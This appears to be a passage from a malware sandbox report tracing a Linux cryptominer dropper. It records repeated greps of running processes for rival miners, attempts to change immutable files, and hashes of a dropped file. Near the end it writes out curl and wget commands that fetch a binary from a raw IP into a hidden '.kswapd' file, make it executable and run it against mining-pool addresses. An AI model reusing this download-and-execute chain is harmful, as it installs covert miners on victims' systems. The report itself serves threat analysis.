/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/969/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/973/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/973/exe2⤵
-
/bin/readlinkreadlink /proc/1023/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1023/exe2⤵
-
/bin/readlinkreadlink /proc/1033/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1033/exe2⤵
-
/bin/readlinkreadlink /proc/1047/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1047/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1053/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1053/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1066/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1066/exe2⤵
-
/bin/readlinkreadlink /proc/1070/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1070/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1074/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1074/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1077/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1077/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1080/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1080/exe2⤵
-
/bin/readlinkreadlink /proc/1090/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1090/exe2⤵
-
/bin/readlinkreadlink /proc/1094/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1094/exe2⤵
-
/bin/readlinkreadlink /proc/1103/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1103/exe2⤵
-
/bin/readlinkreadlink /proc/1113/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1113/exe2⤵
-
/bin/readlinkreadlink /proc/1124/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1124/exe2⤵
-
/bin/readlinkreadlink /proc/1128/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1128/exe2⤵
-
/bin/readlinkreadlink /proc/1132/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1132/exe2⤵
-
/bin/readlinkreadlink /proc/1136/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1136/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1140/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1140/exe2⤵
-
/bin/readlinkreadlink /proc/1144/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1144/exe2⤵
-
/bin/readlinkreadlink /proc/1149/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1149/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1153/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1153/exe2⤵
-
/bin/readlinkreadlink /proc/1155/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1155/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1157/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1157/exe2⤵
-
/bin/readlinkreadlink /proc/1158/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1158/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1163/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1163/exe2⤵
-
/bin/readlinkreadlink /proc/1173/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1173/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1174/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1174/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1176/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1176/exe2⤵
-
/bin/readlinkreadlink /proc/1177/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1177/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1182/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1182/exe2⤵
-
/bin/readlinkreadlink /proc/1192/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1192/exe2⤵
-
/bin/readlinkreadlink /proc/1193/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1193/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1194/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1194/exe2⤵
-
/bin/readlinkreadlink /proc/1195/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1195/exe2⤵
-
/bin/readlinkreadlink /proc/1196/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1196/exe2⤵
-
/bin/readlinkreadlink /proc/1199/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1199/exe2⤵
-
/bin/readlinkreadlink /proc/1203/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1203/exe2⤵
-
/bin/readlinkreadlink /proc/1236/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1236/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1239/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1239/exe2⤵
-
/bin/readlinkreadlink /proc/1260/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1260/exe2⤵
-
/bin/readlinkreadlink /proc/1267/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1267/exe2⤵
-
/bin/readlinkreadlink /proc/1280/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1280/exe2⤵
-
/bin/readlinkreadlink /proc/1292/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1292/exe2⤵
-
/bin/readlinkreadlink /proc/1300/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1300/exe2⤵
-
/bin/readlinkreadlink /proc/1312/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1312/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1317/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1317/exe2⤵
-
/bin/readlinkreadlink /proc/1322/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1322/exe2⤵
-
/bin/readlinkreadlink /proc/1350/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1350/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1358/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1358/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1390/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1390/exe2⤵
-
/bin/readlinkreadlink /proc/1485/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1485/exe2⤵
-
/bin/readlinkreadlink /proc/1512/cwd2⤵
-
/bin/catcat /proc/1512/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
-
/bin/readlinkreadlink /proc/1513/cwd2⤵
-
/bin/catcat /proc/1513/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
-
/bin/readlinkreadlink /proc/1514/cwd2⤵
-
/bin/catcat /proc/1514/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
-
/bin/readlinkreadlink /proc/1558/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1558/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/1996/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/1996/exe2⤵
-
/usr/bin/cutcut -c 1-322⤵
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵
-
/usr/bin/cutcut -c 1-322⤵
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep x86_642⤵
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra64 -o /.cache/.kswapd2⤵
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra64 -O /.cache/.kswapd2⤵
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵
- Executes dropped EXE
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
/tmp/.gCM8WmmCs9RAsj7u
-
Filesize
17B
-
MD5
c5324e9e32e96381871c0f43647c480d
-
SHA1
125de9ed319b53bc415d6b1a934ce2faf957110d
-
SHA256
14aec313084082fc1778a36d44131c2f4c8fcc121fd4bbfcf18097d928c6006f
-
SHA512
3f23db8c6220cf68f92fec98b69de286706c3d2570077c92c11bd020163a7e8895e20147788fbc4ee8a97316b543c4959db622214bdf34f77d3eced74c4b0b2a